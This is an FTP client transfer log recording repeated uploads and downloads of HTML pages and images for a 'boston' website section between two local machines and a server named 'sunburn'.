10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
